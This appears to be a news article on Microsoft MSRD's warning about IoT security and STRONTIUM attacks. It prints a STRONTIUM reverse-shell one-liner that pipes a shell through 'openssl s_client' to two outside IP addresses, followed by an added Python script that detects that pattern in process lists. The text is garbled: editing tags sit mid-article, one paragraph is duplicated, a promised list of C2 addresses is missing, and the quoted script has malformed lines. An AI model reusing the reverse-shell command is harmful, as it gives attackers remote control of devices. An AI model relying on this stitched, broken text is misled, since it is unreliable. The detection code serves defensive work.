The Microsoft Security Research and Defense (MSRD) team has published a warning on its official blog about the growing security concerns around IoT (Internet-of-Things) devices, and botnet infections in particular. Redmond notes that the installed base of IoT devices is forecast to grow to as many as 50 billion units globally, and that many of these devices ship from the factory with known security and privacy flaws. One example is the built-in telemetry that vendors install on their devices: it is useful for troubleshooting, but it can also leak user data and location (spatial) data.
Redmond also singled out malware families that target IoT devices, including the Mirai botnet of 2016 and the spread of the VPNFilter infection in 2018. Microsoft also recalled how IoT devices deployed at the 2018 Olympics became easy targets for attackers, including the printers used to mass-produce tickets for the event and the media center serving domestic and foreign journalists.
Just as with full-fledged desktop computers, laptops and smartphones, the weakest link in IoT security is the way the devices are deployed. Many IoT devices in production still use the factory-default usernames and passwords. These default credentials exist for ease of deployment, but system administrators should change them before the installation is considered complete, in order to prevent unauthorized access to the device's configuration.
</gml_replace>
<gr_replace lines="4" cat="clarify" orig="Microsoft also">
Microsoft also brought up the bad habit, common among device maintainers, of not upgrading the firmware on IoT devices, which opens a hole in an otherwise secure deployment procedure. Redmond is keen on forcibly pushing updates to its Windows desktop operating system, even to the annoyance of its customer base. It seems the same treatment is in order for IoT: since users and even system administrators will not do it themselves, the devices need to auto-update.
Microsoft also brought-up the bad habit of device maintainers of not upgrading the firmware for IoT devices, something that creates a loophole to an otherwise secure deployment procedure. Redmond is keen on forcibly pushing the updates to their Windows desktop operating system, even to the annoyance of their customer base. Seems like the same treatment for IoT is in order, as the users and even the system administrators will not do it themselves, the devices need to auto-update.
“While much of the industry focuses on the threats of hardware implants, we can see in this example that adversaries are happy to exploit simpler configuration and security issues to achieve their objectives. These simple attacks taking advantage of weak device management are likely to expand as more IoT devices are deployed in corporate environments,” explained the MSRD team.
After VPNFilter in 2018, Redmond has expressed concern about a strong campaign of IoT-targeted attacks that it attributes to the actor it dubs STRONTIUM. The company has already contacted both private and public sector organizations globally, sending 1400+ notifications that warn the recipients to monitor their devices for possible infection. “The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors: government, IT, military, defense, medicine, education, and engineering. We have also observed and notified STRONTIUM attacks against Olympic organizing committees, anti-doping agencies, and the hospitality industry,” added the MSRD team.
MSRD enumerated the following public IPv4 addresses as the Command and Control servers of STRONTIUM:
The following is the script that MSRD published as the one STRONTIUM uses to install itself on an IoT device; as presented, the code keeps itself running in the background and re-establishes its connection even after a power cycle:
export [IOT Device] ="-qws -display :1 -nomouse"
echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 220.127.116.11 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 18.104.22.168 -port 443"); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' &
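The script above has a few distinctive traits a defender can hunt for on Linux-based IoT devices: an openssl s_client TLS connection whose input and output are wired to a shell through a while loop, a hidden retry counter in /tmp/.c that ends with pkill -f openssl, and an until loop pushed into the background so the connection is retried. The following is an added detection example, not code from MSRD or from the original post; the process listing it scans is constructed, the IP addresses in it are documentation-range placeholders, and the indicator names and severity thresholds are this example's own choices.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of process command lines, as a defender might collect from
# `ps -eo args` on a fleet of Linux-based IoT devices. 203.0.113.x is a
# documentation range, not a real command-and-control address.
SAMPLE_PROCESS_LINES: List[str] = [
    "/usr/sbin/dropbear -p 22",
    "sh -c (until (sh -c \"openssl s_client -quiet -host 203.0.113.10 -port 443 "
    "|while : ; do sh && break; done| openssl s_client -quiet -host 203.0.113.11 -port 443\"); "
    "do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp/.c && "
    "if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&",
    "openssl s_client -quiet -host 203.0.113.10 -port 443",
    "/usr/bin/python3 /opt/agent/telemetry.py",
    "curl -s https://updates.example.invalid/firmware.bin",
]

# Indicators modelled on the persistence script quoted on this page. The first
# three are strong on their own; the last one is weak (an openssl TLS client
# in quiet mode is unusual on an embedded device but not malicious by itself).
INDICATORS: Dict[str, re.Pattern] = {
    # openssl TLS client whose stdio is joined to a shell through a while loop
    "openssl_piped_to_shell": re.compile(r"openssl\s+s_client\b[^|]*\|\s*while\b.*\bsh\b"),
    # hidden retry counter in /tmp followed by killing openssl when it is exhausted
    "tmp_counter_with_pkill": re.compile(r"/tmp/\.c\b.*pkill\s+-f\s+['\"]?openssl"),
    # an 'until' loop launched in the background so the connection is retried
    "background_until_loop": re.compile(r"\buntil\s*\(.*\bdone\s*\)\s*&"),
    # weak: bare openssl client in quiet mode
    "openssl_quiet_client": re.compile(r"openssl\s+s_client\b.*-quiet\b"),
}
STRONG_INDICATORS = {"openssl_piped_to_shell", "tmp_counter_with_pkill", "background_until_loop"}

# Pull every "-host X -port N" pair out of a command line so the endpoints can
# be cross-checked against threat-intelligence feeds and firewall logs.
C2_ENDPOINT_RE = re.compile(r"-host\s+(\S+)\s+-port\s+(\d+)")


def extract_c2_endpoints(cmdline: str) -> List[Tuple[str, str]]:
    """Return sorted, de-duplicated (host, port) pairs found in the command line."""
    return sorted(set(C2_ENDPOINT_RE.findall(cmdline)))


def classify(indicators: List[str]) -> str:
    """Any strong indicator makes the finding high severity; weak ones alone are low."""
    return "high" if STRONG_INDICATORS.intersection(indicators) else "low"


def scan_process_lines(lines: List[str]) -> List[Dict]:
    """Return one finding per process line that matches at least one indicator."""
    findings = []
    for idx, line in enumerate(lines):
        hits = [name for name, rx in INDICATORS.items() if rx.search(line)]
        if hits:
            findings.append({
                "index": idx,
                "indicators": hits,
                "severity": classify(hits),
                "c2_endpoints": extract_c2_endpoints(line),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_process_lines(SAMPLE_PROCESS_LINES):
        print(f"[{finding['severity']}] line {finding['index']}: "
              f"{', '.join(finding['indicators'])} -> {finding['c2_endpoints']}")
```

On the constructed sample the full persistence loop is reported as high severity with both endpoints extracted, while the lone openssl client process is reported as low severity, which is the kind of weak signal worth correlating with outbound TLS connections to unexpected hosts rather than alerting on directly.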